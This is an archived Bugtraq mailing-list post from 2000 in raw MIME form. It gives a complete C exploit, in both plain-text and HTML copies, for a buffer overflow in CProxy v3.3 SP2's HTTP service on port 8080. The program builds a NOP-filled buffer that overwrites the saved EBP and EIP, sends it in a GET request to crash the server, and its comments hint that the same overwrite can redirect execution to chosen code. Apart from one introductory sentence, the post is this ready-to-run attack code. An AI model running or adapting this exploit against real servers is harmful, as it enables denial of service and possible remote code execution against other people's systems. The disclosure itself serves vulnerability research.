[14921] in bugtraq
CProxy v3.3 SP 2 DoS
daemon@ATHENA.MIT.EDU (|[TDP]|)
Tue May 16 17:06:35 2000
Mime-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_007A_01BFBF59.A07240A0"
Message-Id: <007d01bfbf48$e44f0e40$01dc11ac@peopletel.org>
Date: Tue, 16 May 2000 17:10:25 +0200
Reply-To: "|[TDP]|" <tdp@PSYNET.NET>
From: "|[TDP]|" <tdp@PSYNET.NET>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_007A_01BFBF59.A07240A0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Last day I found a vulnerability in CProxy while I was testing it to =
install in a
host server in one office... Here is the test that demonstrate the =
existence of the bug
/*
* Remote Denial of Service for CProxy v3.3 - Service Pack 2
*=20
* (C) |[TDP]| - HaCk-13 TeaM - 2000 <tdp@psynet.net>
*
*
* This program xploits an overflow vulnerability in CProxy 3.3 SP2
* HTTP Service (8080), causing server shutdown
*
* Greetings to all the other members and all my friends :)=20
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define BUFFERSIZE 247
#define NOP 0x90
// If you change this values you can change EIP and EBP values
// to redirect to a code that you want >;)
#define EIP 0x61616161
#define EBP 0x61616161
void usage(char *progname) {
fprintf(stderr,"Usage: %s <hostname> [eip] [ebp]\n",progname);
exit(1);
}
int main(int argc, char **argv) {
char *ptr,buffer[BUFFERSIZE], remotedos[1024];
unsigned long *long_ptr,eip=3DEIP, ebp=3DEBP;
int aux,sock;
struct sockaddr_in sin;
unsigned long ip;
struct hostent *he;
fprintf(stderr,"\n-=3D Remote DoS for CProxy v3.3 ServicePack 2 - (C) =
|[TDP]| - H13 Team =3D-\n");
if (argc<2) usage(argv[0]);
if (argc>=3D3) eip+=3Datol(argv[2]);
if (argc>=3D4) ebp+=3Datol(argv[3]);
ptr=3Dbuffer;
memset(ptr,0,sizeof(buffer));
memset(ptr,NOP,sizeof(buffer)-8);
ptr+=3Dsizeof(buffer)-8;
long_ptr=3D(unsigned long*)ptr;
*(long_ptr++) =3D ebp;
*(long_ptr++) =3D eip;
ptr=3D(char *)long_ptr;
*ptr=3D'\0';
bzero(remotedos, sizeof(remotedos));
snprintf(remotedos, sizeof(remotedos), "GET http://%s =
HTTP/1.0\r\n\r\n\r\n",buffer);
if ((sock =3D socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
perror("socket()");
return -1;
}
if ((he =3D gethostbyname(argv[1])) !=3D NULL) {
ip =3D *(unsigned long *)he->h_addr;
} else {
if ((ip =3D inet_addr(argv[1])) =3D=3D NULL) {
perror("inet_addr()");
return -1;
}
}
sin.sin_family =3D AF_INET;
sin.sin_addr.s_addr =3D ip;
sin.sin_port =3D htons(8080);
fprintf(stderr,"\nEngaged...\n");
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
perror("connect()");
return -1;
}
if (write(sock, remotedos, strlen(remotedos)) < strlen(remotedos)) {
perror("write()");
return -1;
}
fprintf(stderr,"Bye Bye baby!...\n\n");
if (close(sock) < 0) {
perror("close()");
return -1;
}
return(0);
}
------=_NextPart_000_007A_01BFBF59.A07240A0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2722.2800" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2><BR> Last day I found a =
vulnerability in=20
CProxy while I was testing it to install in a<BR>host server in one =
office...=20
Here is the test that demonstrate the existence of the bug</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>/*<BR> * Remote Denial of Service =
for CProxy=20
v3.3 - Service Pack 2<BR> * <BR> * (C) |[TDP]| - HaCk-13 =
TeaM=20
- 2000 <<A=20
href=3D"mailto:tdp@psynet.net">tdp@psynet.net</A>><BR> *<BR> =
;*<BR> *=20
This program xploits an overflow vulnerability in CProxy 3.3 =
SP2<BR> * HTTP=20
Service (8080), causing server shutdown<BR> *<BR> * Greetings =
to all=20
the other members and all my friends :) <BR> */</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>#include <stdio.h><BR>#include=20
<stdlib.h><BR>#include <unistd.h><BR>#include=20
<sys/socket.h><BR>#include <sys/types.h><BR>#include=20
<netdb.h><BR>#include <netinet/in.h><BR>#include=20
<arpa/inet.h></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>#define BUFFERSIZE 247<BR>#define NOP =
0x90<BR>// If=20
you change this values you can change EIP and EBP values<BR>// to =
redirect to a=20
code that you want >;)<BR>#define EIP 0x61616161<BR>#define EBP=20
0x61616161</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>void usage(char *progname)=20
{<BR> fprintf(stderr,"Usage: %s <hostname> [eip]=20
[ebp]\n",progname);<BR> exit(1);<BR>}</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>int main(int argc, char **argv) =
{<BR>char=20
*ptr,buffer[BUFFERSIZE], remotedos[1024];<BR>unsigned long =
*long_ptr,eip=3DEIP,=20
ebp=3DEBP;<BR>int aux,sock;<BR>struct sockaddr_in sin;<BR>unsigned long=20
ip;<BR>struct hostent *he;</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> fprintf(stderr,"\n-=3D Remote DoS =
for CProxy=20
v3.3 ServicePack 2 - (C) |[TDP]| - H13 Team =3D-\n");</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> if (argc<2) =
usage(argv[0]);</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> if (argc>=3D3)=20
eip+=3Datol(argv[2]);</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> if (argc>=3D4)=20
ebp+=3Datol(argv[3]);</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial=20
size=3D2> ptr=3Dbuffer;<BR> memset(ptr,0,sizeof(buffer));<BR>&n=
bsp;memset(ptr,NOP,sizeof(buffer)-8);<BR> ptr+=3Dsizeof(buffer)-8;<B=
R> long_ptr=3D(unsigned=20
long*)ptr;<BR> *(long_ptr++) =3D ebp;<BR> *(long_ptr++) =3D=20
eip;<BR> ptr=3D(char *)long_ptr;<BR> *ptr=3D'\0';</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> bzero(remotedos,=20
sizeof(remotedos));<BR> snprintf(remotedos, sizeof(remotedos), "GET =
<A=20
href=3D"http://%s">http://%s</A> =
HTTP/1.0\r\n\r\n\r\n",buffer);</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> if ((sock =3D socket(AF_INET, =
SOCK_STREAM,=20
IPPROTO_TCP)) < 0) {<BR> perror("socket()");<BR> return=20
-1;<BR> }</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> if ((he =3D =
gethostbyname(argv[1])) !=3D NULL)=20
{<BR> ip =3D *(unsigned long *)he->h_addr;<BR> } else =
{<BR> if=20
((ip =3D inet_addr(argv[1])) =3D=3D NULL)=20
{<BR> perror("inet_addr()");<BR> return=20
-1;<BR> }<BR> }</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> sin.sin_family =3D=20
AF_INET;<BR> sin.sin_addr.s_addr =3D ip;<BR> sin.sin_port =3D=20
htons(8080);</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial =
size=3D2> fprintf(stderr,"\nEngaged...\n");<BR> if=20
(connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0)=20
{<BR> perror("connect()");<BR> return =
-1;<BR> }</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> if (write(sock, remotedos, =
strlen(remotedos))=20
< strlen(remotedos)) {<BR> perror("write()");<BR> return=20
-1;<BR> }</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2> fprintf(stderr,"Bye Bye=20
baby!...\n\n");<BR> if (close(sock) < 0)=20
{<BR> perror("close()");<BR> return =
-1;<BR> }</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial=20
size=3D2> return(0);<BR>}<BR></FONT></DIV></BODY></HTML>
------=_NextPart_000_007A_01BFBF59.A07240A0--
